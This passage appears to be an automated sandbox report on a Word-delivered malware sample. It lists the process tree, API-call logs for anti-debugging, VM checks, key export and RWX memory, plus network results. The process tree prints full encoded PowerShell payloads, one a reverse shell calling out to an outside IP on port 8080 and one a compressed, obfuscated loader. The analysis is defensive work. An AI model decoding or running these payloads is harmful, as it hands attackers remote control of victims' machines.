BDADAAQQAnACsAJwBUAHcAQgBpAEEARwBvAEEAWgBRAEIAagBBAEgAUQBBAEkAJwArACcAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEUANABBAFoAUQBCADAAQQBDADQAQQBVAHcAQgB2AEEARwBNAEEAYQB3AEIAJwArACcAbABBAEgAUQBBAGMAdwBBAHUAQQBGAFEAQQBRAHcAQgAnACsAJwBRAEEARQBNAEEAYgBBAEIAcABBAEcAVQBBAGIAZwBCADAAQQBDAGcAQQAnACsAJwBJAGcAQQB6AEEARABRAEEATABnAEEAeABBACcAKwAnAEQASQBBAE0AdwBBAHUAQQBEAEUAQQBOACcAKwAnAGcAQQB4AEEAQwA0AEEATQBRAEEAMgBBAEQAawBBAEkAZwBBAHMAQQBDAEEAQQBPAEEAQQB3AEEAQwBrAEEATwB3AEEATgBBAEEAbwBBAEoAJwArACcAQQBCAHoAJwArACcAQQAnACsAJwBIAFEAQQBjAGcAQgBsAEEARwBFAEEAYgBRAEEAZwBBAEQAMABBAEkAQQBBAGsAQQBHAE0AQQBiAEEAQgBwAEEARwBVAEEAYgBnAEIAMABBAEMANABBAFIAdwBCAGwAQQBIAFEAQQBVAHcAQgAwAEEASABJAEEAWgBRAEIAaABBAEcAMABBAEsAQQBBAHAAQQBEAHMAQQBEAFEAQQBLAEEAQQAwAEEAJwArACcAQwBnAEIAYgBBAEcASQBBAGUAUQBCADAAQQBHAFUAQQBXAHcAQgBkAEEARgAwAEEASgBBACcAKwAnAEIAaQBBAEgAawBBAGQAQQBCAGwAQQBIAE0AQQBJACcAKwAnAEEAQQA5AEEAJwArACcAQwBBAEEATQBBAEEAdQAnACsAJwBBAEMANABBAE4AZwBBADEAQQBEAFUAQQBNAHcAQQAxAEEASAB3AEEASgBRAEIANwBBAEQAQQBBAGYAUQBBADcAQQBBADAAQQBDAGcAQgAzAEEARwBnAEEAYQBRAEIAcwBBAEcAVQBBAEsAQQBBAG8AQQBDAFEAQQBhAFEAQQBnAEEARAAwAEEASQBBAEEAawBBAEgATQBBAGQAQQBCAHkAQQBHAFUAQQBZAFEAQgB0AEEAQwA0AEEAVQBnAEIAbABBAEcARQBBAFoAQQBBAG8AQQBDAFEAQQAnACsAJwBZAGcAQgA1AEEASABRAEEAWgBRAEIAegBBAEMAdwAnACsAJwBBAEkAQQBBAHcAQQBDAHcAQQBJAEEAQQBrAEEARwBJAEEAZQBRAEIAMABBAEcAVQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAawBBAEsAUQBBAGcAQQBDADAAQQBiAGcAQgBsAEEAQwBBAEEAJwArACcATQBBAEEAcABBAEMAQQBBAGUAdwBBAE4AQQBBAG8AQQBJAEEAQQBnAEEAQwBBAEEASQBBAEEAawBBAEcAUQBBAFkAUQBCADAAQQBHAEUAQQBJAEEAQQA5AEEAQwBBAEEASwBBAEIATwBBAEcAVQBBAGQAdwAnACsAJwBBAHQAQQBFADgAQQBZAGcAQgBxAEEARwBVAEEAWQB3AEIAMABBAEMAQQBBAEwAUQBCAFUAQQBIAGsAQQBjAEEAQgBsAEEARQA0AEEAWQBRAEIAdABBAEcAVQBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYAUQBBAFoAUQBCADQAQQBIAFEAQQBMAGcAQgBCAEEARgBNAEEAUQAnACsAJwB3AEIASgBBAEUAawBBAFIAUQBCACcAKwAnAHUAQQBHAE0AQQBiAHcAQgBrAEEARwBrAEEAYgBnAEIAbgBBAEMAawBBAEwAZwBCAEgAQQBHAFUAQQBkAEEAQgBUAEEASABRAEEAYwBnAEIAcABBAEcANAAnACsAJwBBAFoAdwBBAG8AQQBDAFEAQQBZAGcAQgA1AEEASABRAEEAWgBRAEIAegBBAEMAdwBBAE0AQQBBACcAKwAnAHMAQQBDAEEAQQBKAEEAQgBwAEEAQwBrAEEATwB3AEEATgBBAEEAbwBBACcAKwAnAEkAQQBBAGcAQQBDAEEAQQBJAEEAQQBrAEEASABNAEEAWgBRAEIAdQBBAEcAUQBBAFkAZwBCAGgAQQBHAE0AQQBhAHcAQQBnAEEARAAwAEEASQBBAEEAbwBBAEcAawBBAFoAUQBCADQAQQBDAEEAQQBKAEEAQgAnACsAJwBrAEEARwBFAEEAZABBAEIAaABBAEMAQQBBAE0AZwBBACsAQQBDAFkAQQBNAFEAQQBnAEEASAB3AEEASQBBAEIAUABBAEgAVQAnACsAJwBBAGQAQQBBAHQAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEMAQQBBAEsAUQBBADcAQQBBADAAQQBDAGcAQQBnAEEAQwBBAEEASQBBAEEAZwBBAEMAUQBBAGMAdwBCAGwAJwArACcAQQBHADQAQQBaAEEAQgBpAEEARwBFAEEAWQB3AEIAcgBBAEQASQBBAEkAQQBBADkAQQBDAEEAQQBKAEEAQgB6AEEARwBVAEEAYgBnAEIAawBBAEcASQBBAFkAUQBCAGoAQQAnACsAJwBHAHMAQQBJAEEAQQByAEEAQwBBAEEASQBnAEIAUQBBAEYATQBBAEkAQQBBAGkAQQBDAEEAQQAnACsAJwBLAHcAQQBnAEEAQwBnAEEAYwBBAEIAMwBBAEcAUQBBAEsAUQBBAHUAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAcgBBAEMAQQBBAEkAZwBBACsAQQBDAEEAJwArACcAQQBJAGcAQQA3AEEAQQAwAEEAQwBnAEEAZwBBAEMAQQBBAEkAQQBBAGcAQQBDAFEAQQBjAHcAQgBsAEEARwA0AEEAWgBBAEIAaQBBAEgAawBBAGQAQQBCAGwAQQBDAEEAQQBQAFEAQQBnAEEAQwBnAEEAVwB3AEIAMABBAEcAVQBBAGUAQQBCADAAQQBDADQAQQBaAFEAQgB1AEEARwBNAEEAYgB3AEIAawBBAEcAawBBAGIAZwBCAG4AQQBGADAAQQBPAGcAQQAnACsAJwA2ACcAKwAnAEEARQBFACcAKwAnAEEAVQB3AEIARAAnACsAJwBBAEUAawBBAFMAUQBBAHAAJwArACcAQQBDADQAJwArACcAQQBSAHcAJwArACcAQgBsAEEASABRAEEAUQBnAEIANQBBAEgAUQBBAFoAUQBCAHoAQQBDAGcAQQAnACsAJwBKAEEAQgB6AEEARwBVAEEAYgBnAEIAawAnACsAJwBBAEcASQBBAFkAUQBCAGoAQQAnACsAJwBHAHMAQQBNAGcAQQBwAEEARABzAEEARABRAEEASwBBAEMAQQBBAEkAQQBBAGcAQQBDAEEAQQBKACcAKwAnAEEAQgB6AEEASABRAEEAYwBnAEIAbABBAEcARQBBAGIAUQAnACsAJwBBAHUAQQBGAGMAQQBjAGcAQgBwAEEASABRAEEAWgBRAEEAbwBBAEMAUQBBAGMAdwBCAGwAQQBHADQAQQBaAEEAQgBpAEEASABrAEEAJwArACcAZABBAEIAbABBAEMAdwBBAE0AQQBBAHMAQQBDAFEAQQBjAHcAQgBsAEEARwA0AEEAWgBBAEIAaQBBAEgAawBBAGQAQQBCAGwAQQBDADQAJwArACcAQQBUAEEAQgBsAEEARwA0AEEAWgB3AEIAMABBAEcAZwBBAEsAUQBBADcAQQBBADAAQQBDAGcAQQBnAEEAQwBBAEEASQBBAEEAZwBBAEMAUQBBAGMAdwBCADAAQQBIAEkAJwArACcAQQBaAFEAQgBoAEEARwAwAEEATABnAEIARwBBAEcAdwBBAGQAUQBCAHoAQQBHAGcAQQBLAEEAQQBwAEEAQQAnACsAJwAwAEEAQwBnAEIAOQBBAEQAcwBBAEQAUQAnACsAJwBBAEsAJwArACcAQQBBADAAQQBDAGcAQQBrAEEARwBNAEEAYgBBAEIAcABBAEcAVQBBAGIAZwBCADAAQQBDADQAQQBRAHcAQgBzAEEARwA4AEEAYwB3AEIAbABBAEMAZwBBAEsAUQBBAD0AJwApADsADQAKACAAIAAgACAAcwBgAFQAYABBAHIAYABUAC0AcwBMAEUARQBQACAALQBTAGUAYwBvAG4AZABzACAANgAwADAALgAwADsADQAKAH0A
  2232
- powershell.exe powershell -Enc KABuAGUAVwAtAG8AQgBKAGUAQwBUACAAaQBPAC4AYwBPAG0AUABSAEUAUwBzAGkATwBuAC4ARABlAGYATABhAFQARQBzAHQAcgBlAGEAbQAoAFsAaQBPAC4ATQBFAE0ATwByAFkAUwBUAHIARQBhAE0AXQBbAHMAWQBTAHQAZQBtAC4AQwBvAG4AdgBFAFIAVABdADoAOgBGAHIAbwBtAEIAYQBzAEUANgA0AHMAdABSAGkAbgBnACgAJwByAFYAVgBSAGIAOQBvADYARgBIADUASAA0AGoAOQBZAEMAQQBtAGkAawBaAFIAYgBXAEsAZABMAFYAVwBtAFUAcgBoAHUANgBhADEAYwBKAGQAdgBmAEEAKwBtAEMAYwBBAC8ASABGADIASgBuAHQAbABIAEsAMwAvAHYAYwBkAHgAdwBtAEYAagBqAHgATQBtAGwAOABTAE8ALwBiADMAZgBlAGUAYwA3AHoAaABOAFMAeQA1AEkAYQAzAFkAbAB4AEgAaQBkAEsAbQAzAGIAagBjAHkAQQA3AHAAMQBHAHMAUgBDAE4ANABKADYAawAyAFYAeAB3AFIAbwB5AGwARgBoAC8AdwBhAEUARgBMAE0AbABkAEsAawBFAG0AaQBOAGwAKwA0AGoATgBXAG0AegBhAFUAbABDAFoAVwB4AGcAQQA1AHgANwAyADQAMwBCAE8AZQB0AGUAbwAzAEcAYwBXAGkAMwBLAFoAQgBRADAAagBXAFEARABaAGMAawBYAE0ATgA2AEQAcABvADAAcgBWADgAMABLAFcAVgBBAEoATwBJAC8AUQBMADAAMgA4AHkAOABSADcAcgB3AGYARABQAFkANAAyAHIAUABKADEAbABoAFkAUgAxAGUAYwBMAHEAVQB5AEsATQBkAEUAZAAxAG8AeABNAEEAWgAzAHYAZwBjADcAeQByAFEARwBhAFkAdQAxAGQAawBCACsARQBGAHcATgBpADMAawBRADMAVgBBAHUAUABkAGkASABRAG0AcwAzAHEATgBmAHEAdABVAFUAbQBtAGUAVgBLAGsAcgBGADgAVQBDAHMASQBoACsAMwBtAEgAYgBVAEoANQBxAFgAUgBCAFAAawB3AFEATgBMADAANgB3AHEAMgBRAGkAMgBYAG8AQwBQADcAYQBCAHMAQgArAFYANgB2AEUAUgB4AE4AdwA1AGUAbwBPAE4ATgBnAGMAUAA5AGIAagBMAGcAaQBsAFIAMAB5AFMAcQBpAGUAZwBMADAAbwBuAHQARQB3AHMANgBwAEQAMwBqADEAUwBaAGkAYwBwAEMATQBIAGwAOABzAEwAcQBEAEkATAA3AGUAdQAxAG8AMQBrADIAQwBvAEMANgBrAG8AZABsAEsAOQBnADkAcwBKAHkANwBOAGUAZgBJAGYAdQBMAFkAWgBGAGIAZwAyAFUAagBGAG0ALwBqAGQAbABWAEYASQA2AGIAQwBSAEUAMwBMAG0AaQBPAHYAYQBFADgANgAyAEYAMgBUADMAQgBqAEIAUgAxAC8AcABOAHMATgB6AFQAOQBkAHgAZABNAE8AMwBOAEwAbQBZAHYASgBHAHkAdgBEAHoAMQBPADAAMAA1AC8AbABuAEsAcgBQAGsAagBNAGsAOABYAHcAYgBKAHcARABaAE8AOABSAFAASgA0AHgASwBMADYARwBJAFgASwBSAGwANwBCADEAUwBtAEgASwBLAGMATgBIAEUAYQBpAHoAaQBaAGMAWgBGAGoAUAA1AE8ATgArAGIALwB5ADIAeQB4ADgATQBvAFoAUwAvAHoARQBZADEANABMAHUAagBRAHUAaQB0AFoAYgBaADgASABjAFMAcwBPADcATQBYAHAAbwBpAEIAMAB6AHoAVAB2AG0ASgB1ACsAVABLADEAaAB3AHkAWABOAC8ANwBwAHMAdAB2AEgAWAA5ADEARQBJAC8AOQAwADUAYgBmAHUAWQBiAHkAYQBHAEUAZAA5AFMAWQBhAGEASwB6AEgAYgBiAE0AaABFAEQAdwBXADkAaQBFAFkAOQBUAHIAZABxAEQARAB2AGMALwB6AGwAWgB6AHkAbQBnAHYAawB2AFYAYQBhAFEAWABuAFMANgBtADMAcABkAFQAYwAyAGkAZAB2AFMAYgB1AFoARwAzAGYALwBnAEIAdABwAEQAMgAzAEEAaQBBAEYASgBVAHoAOQBIAFMAQgBwAGkAUwBzAFMARwB2AHUAeQBWAGUATwBSAFoASwBJAHcAdwAxAGoASABQAFUAOQBmAGMANQBLAGQANQBEAGgARAA5ADkAMwBTAC8AbgByADEANwA5AHcAdQBMAGIAegBtAFUAZgBEADcAcQBrADUAYwAxAC8AMgBCAFAAKwBjAFAAQwBTADEAQQAyACsAUQBGADUALwBQAEkAUgB2AEoATwB5AGQAdgBqAGwANwBjADUAUgBrAFAAMwBFAHoAagBNAE0AbwBBAFgAagBUAGoARwBoAHEAUABpAHEAMgBPAGcAYQBlAEgAMwBsAHUAeABwADMAQQBRADEAZAA3AGQAUgAzAFMATwB5AG8AdwB4ADEAagBOAHkAdwBoAGQAeQBUADcATgAvAHcATwBHADEANgBVAHIAVQBsADcAMwBTADIALwBFAGMASwBpAFgAMgBSAHIAdgB2AEkALwBjAFcARQB6AGIAVwBRAFUAYQBTADQAQwB0AG4AaQBGADMAUwBUAHYAcwA2ADUASQAwAHEARQBCAFoAYgB4AGwAMgBWAEoAVwBrAHkAawBhAG8AUQBEAE0AWgBjADkAZgB5AFQAcwA1AHoARQA1AGIAcAAyAFUAdABrAFoANQBlAFIAVABxAGwAagA5AHgASgBoAFEAUwBqAGoAZABsAHYAZQA1ADgAZgBvAGYATgBVADkAWgBXAFcAeAAzAFMAagAvAE0AdQBOAFAAawBlAHMARwByAFAAYwB3AFQAVQBIAEcAUQB5AEYAYwBhAFAANwBYAHMAQwBkAGkAdABoAC8AMwBPADQAawBCAFkATwBSADQAcQBnAGkAbQBJAHAAZABQAHYAeQA2AC8AVwBIAG8AeABQAFoAdwAxAE4AKwB5AHcARABJAFcASQBXADcAegB0AHYAcwBCADgASgBEAGgANgA0AHYAegBGAEcAZgArAEwAdwBxAFAAUgA1ADEAUQBvAEcAcgB2AHcAMgBvADMARQAyAG4AUgB3AGMAdABMAHIAUgAyAGYAOQA2AEsAOQArAEwAKwByADEAQgA3ADEAdQB0ADMAdQBDAEYAMgBrAGUAYQA3AEMASABVADQAaAA2AEkAaQBOAHEAVwBVAEsAKwB1ADQAVQBuAGwALwBMAHkAegAvAGsAVAAnACkAIAAsACAAWwBTAFkAUwB0AEUAbQAuAGkATwAuAGMAbwBNAHAAUgBlAHMAcwBJAG8AbgAuAGMATwBNAFAAcgBFAHMAUwBJAE8ATgBNAE8ARABFAF0AOgA6AEQAZQBjAE8ATQBQAHIAZQBzAHMAIAApACAAfABmAE8AcgBFAEEAQwBIAC0AbwBCAEoAZQBjAHQAIAB7ACAAbgBlAFcALQBvAEIASgBlAEMAVAAgACAAcwB5AFMAdABFAG0ALgBpAG8ALgBTAHQAcgBFAGEATQByAEUAYQBkAEUAUgAoACQAXwAsAFsAdABlAFgAdAAuAGUATgBjAG8ARABJAE4ARwBdADoAOgBBAHMAYwBJAGkAKQAgAH0AKQAuAFIAZQBBAGQAVABvAGUATgBEACgAIAApAHwAIAAuACgAIAAkAFAAUwBIAG8AbQBlAFsAMgAxAF0AKwAkAHAAcwBIAE8ATQBlAFsAMwA0AF0AKwAnAFgAJwApAA==
  2744
  - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\w5n2hyfx.cmdline"
    2332
    - cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES8547.tmp" "c:\Users\test22\AppData\Local\Temp\CSC8546.tmp"
      2408
  - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\c0nnsbkt.cmdline"
    2400
    - cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES872B.tmp" "c:\Users\test22\AppData\Local\Temp\CSC871B.tmp"
      2992

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
34.64.143.34	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (13 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 14, 2021, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 14, 2021, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 14, 2021, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:35 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:35 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 14, 2021, 3:35 p.m.			0	0
IsDebuggerPresent Sept. 14, 2021, 3:35 p.m.			0	0

Command line console output was observed (9 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 14, 2021, 3:35 p.m.	buffer: Parameter attributes need to be a constant or a script block. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 14, 2021, 3:35 p.m.	buffer: At line:8 char:33 console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 14, 2021, 3:35 p.m.	buffer: + [ValidateSet(('F'+'ill') <<<< , ('F'+'it'), ('S'+'tre'+'tch'), ('Ti'+ console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 14, 2021, 3:35 p.m.	buffer: 'le'), ('Cente'+'r'), ('Spa'+'n'))] console_handle: 0x00000047	1	1
WriteConsoleW Sept. 14, 2021, 3:35 p.m.	buffer: + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordEx console_handle: 0x00000053	1	1
WriteConsoleW Sept. 14, 2021, 3:35 p.m.	buffer: ception console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 14, 2021, 3:35 p.m.	buffer: + FullyQualifiedErrorId : ParameterAttributeArgumentNeedsToBeConstantOrScr console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 14, 2021, 3:35 p.m.	buffer: iptBlock console_handle: 0x00000077	1	1
WriteConsoleW Sept. 14, 2021, 3:35 p.m.	buffer: False console_handle: 0x00000013	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 176 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b95c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b9300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b9300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b9300 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8f00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8f00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8f00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8f00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8f00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8f00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8a00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b9500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b9500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b9500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b90c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b9500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b9500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b9500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b9500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b9500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b9500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b9500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b93c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b93c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b93c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b93c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b93c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b93c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b93c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b93c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b93c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b93c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b93c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b93c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b93c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b93c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8ac0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8ac0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8ac0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8ac0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8ac0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006b8ac0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d7a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d4e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d4e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d4e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d0e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:35 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0041d0e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

D:\PCC2021\ioc\word_malware\fontmgr\Release\fontmgr.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 14, 2021, 3:35 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 310 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73622000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73523000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 14, 2021, 3:35 p.m.	process_identifier: 2500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x733f1000 process_handle: 0xffffffff	1
